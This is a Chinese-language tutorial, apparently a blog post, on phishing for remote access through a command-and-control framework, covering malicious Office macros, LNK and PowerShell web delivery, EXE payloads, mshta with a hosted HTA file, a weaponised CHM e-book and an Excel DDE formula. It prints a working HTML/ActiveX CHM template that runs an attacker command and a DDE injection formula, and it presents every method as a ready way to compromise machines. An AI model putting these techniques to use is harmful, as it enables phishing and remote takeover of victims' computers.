一、.Office 钓鱼攻击
启动我们的服务端和客户端,详情查看
然后在我们的客户端的有效载荷中选择office宏
选择我们的监听器
生成之后复制我们的宏代码
这里需要注意的是需要使用word文档,不能使用wps word文档,而且要在信任中心打开我们的所有宏
接下来在菜单栏中选择视图中的宏,点击查看宏
为当前文档创建一个宏
将我们刚刚生成的宏代码复制进去
保存下来,它会提示我们如下内容,我们选择是
再次点击word文档,发现我们监听成功
二、lnk 快捷方式钓鱼
选择攻击中的web投递
类型选择为powershell,监听器选择当前的监听器
运行,他会给我们一段命令
我们去运行一下这个命令
发现上线成功
三、powershell
选择有效载荷中的payload生成器
输出格式选择powershell command
点击生成之后,他会给我们生成一个txt文件
我们查看一下内容,发现是一大段命令
我们去执行一下
发现上线成功
四、exe
选择有效载荷中的Windows可执行程序
选择我们的监听地址,创建一个exe文件
将这个exe文件创建下来,在我们的电脑中就可以看到我们刚刚创建的这个exe文件
我们运行一下,可以看到监听到了我们的电脑
五、mshta上线
选择有效载荷中的HTA文档
类型选择poweishell
生成后发现我们的电脑中多了一个hta文件
然后点击站点管理中的文件托管
文件选择刚刚生成的hta文件,其余不变
运行之后,他给了我们一个地址
、
然后我们在我们的电脑中运行如下命令
mshta 你自己的链接
上线成功
六、chm电子书钓鱼
下载地址:https://www.zipghost.com/download/easychm/echmsetup.exe
选择攻击中的web投递
按照之前的操作生成一个命令
创建一个html文件,将下述代码写入其中,并替换其中的命令,并在powershell.exe后加逗号
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",你自己生成的命令>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>修改后如下
创建一个新的文件夹 里面创建两个文件夹,并将我们刚刚创建的html文件添加进去
在chm中新建一个目录,地址选择我们刚刚创建的总文件夹
点击编译,生成
会发现我们的电脑中多了如下文件
双击运行,发现上线成功
七、execl
打开office外部内容中的启用动态数据交换服务器启动功能
构造一个恶意载荷
=1+cmd|' /C calc'!A0输入到表格的随便一格中去,保存发现被执行了
扫一扫
1342
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
